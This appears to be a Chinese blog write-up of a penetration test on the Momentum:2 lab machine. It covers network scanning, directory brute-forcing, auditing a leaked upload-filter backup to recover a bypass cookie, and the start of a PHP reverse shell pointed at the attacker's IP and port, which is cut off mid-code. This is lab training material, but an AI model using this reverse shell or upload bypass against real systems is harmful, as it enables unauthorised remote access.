Momentum:2靶机渗透测试

Momentum:2靶机渗透测试

环境

靶机192.168.19.140
kali攻击机192.168.19.131

工具

nmap netdiscover gobuster 御剑 Xshell msf netcat

流程

用netdiscover对目标网段进行扫描
得到目标主机192.168.19.140
在这里插入图片描述使用nmap对该主机进行端口扫描
在这里插入图片描述

得到端口22与80端口是开启的
上80端口看到只有三张图片就对目录进行爆破

gobuster dir -u http://192.168.19.140/ -x html,php,bak,txt --wordlist /usr/share/wordlist/dirbusters/directory-list-2.3-medium.txt

在这里插入图片描述

http://192.168.19.140/dashboard.html为一个上传文件的页面

在这里插入图片描述
尝试上传shell和php文件都失败了
在这里插入图片描述txt文件可以上传
在这里插入图片描述而目录

http://192.168.19.140/owls/则为上传的目录
在这里插入图片描述
http://192.168.19.140/ajax.php是个空网页
查看源码在最下面有几行代码
在这里插入图片描述在这里插入图片描述根据经验这个网页一定有东西果然用御剑扫到
http://192.168.19.140/ajax.php.bak拷贝文件
在这里插入图片描述
打开该文件是段过滤上传文件的代码
在这里插入图片描述
代码审计大概意思就是当满足这个带有cookie键值为admin=&G6u@B6uDXMq&Ms,再加一个大写字符时是可以上传pdf,php,txt文件的
那就直接burpsuite抓包改包
先准备好反弹shell(找了好几个脚本终于这个可以反弹泪目)

<?php   
    error_reporting (E_ERROR);  
    ignore_user_abort(true);  
    ini_set('max_execution_time',0);  
    $os = substr(PHP_OS,0,3);  
    $ipaddr = '192.168.19.131';  
    $port = '1222';  
    $descriptorspec = array(0 => array("pipe","r"),
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值